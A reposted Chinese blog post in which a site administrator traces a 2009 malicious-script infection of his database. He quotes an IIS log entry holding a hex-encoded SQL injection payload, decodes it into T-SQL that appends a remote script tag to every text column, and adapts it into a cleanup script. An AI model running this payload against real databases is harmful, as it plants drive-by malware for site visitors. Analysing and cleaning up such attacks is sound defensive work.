com/c.js木馬攻擊…)

來源:互聯網
上載者:User

   習慣性地敲打鍵盤,伺服器檢查,程式檢查一切顯得如此和諧,剩下的只有資料驗證了,幾千條行業資料多少也讓我有些頭痛,沒辦法誰叫我不是BOSS呢

  忙活了大半天,弄得暈頭轉向,忽然BOSS來電,跑過去一看,我的乖乖。。真是屋漏又遭連夜雨啊!

    從firefox提示的報告來看被google列入黑名單來看可能肯定是我回家這段時間被人注水了,程式沒問題那資料呢,開啟一看又是一身冷汗。。c.js你好毒啊!

Google一下,沒想到居然還沒這多難兄難弟,my god誰來撫平我受傷的心。。

   沒折了,程式也是N個人改過來改過去的N手貨,鬼知道是哪個地方出問題了,只有硬著頭皮啃IIS日誌了,很意外的發現了一處代碼:

2009-01-16 15:39:57 W3SVC1570028688 202.96.137.63 GET /hdjr.asp y=2008&m=10&d=21&word=%e5%ab%81%e5%a8%b6%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=' 80 - 211.179.110.20 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64

 很顯然state=200意味著什麼,SQL裡執行一下,看一下原形,

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

 

看來不是我要找的3b%6Fmb.com/c.js,估計c.js跟這個也差不多,雖然不是我想要的,倒是可以幫上我不少忙,借用一下注入代碼,批量替換一下被改寫過的內容,如下:

 declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000)
set @inScript='<script src=http://3b%6Fmb.com/c.js></script>'
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
exec('update ['+@t+'] set  ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')'  )
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor;

 

對於被改寫過的內容可以用此方法替換,要想堵住源頭只有在程式上做功課了,在沒有找出程式漏洞前只能退而求其次,SO,程式是關鍵

 

轉自:http://www.jnzblog.cn/post/2009/02/07/I-was-a-bit-hit-Trojan-waist-Hutchison-IE-exploits-cjs-Trojan-attacks-.aspx

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.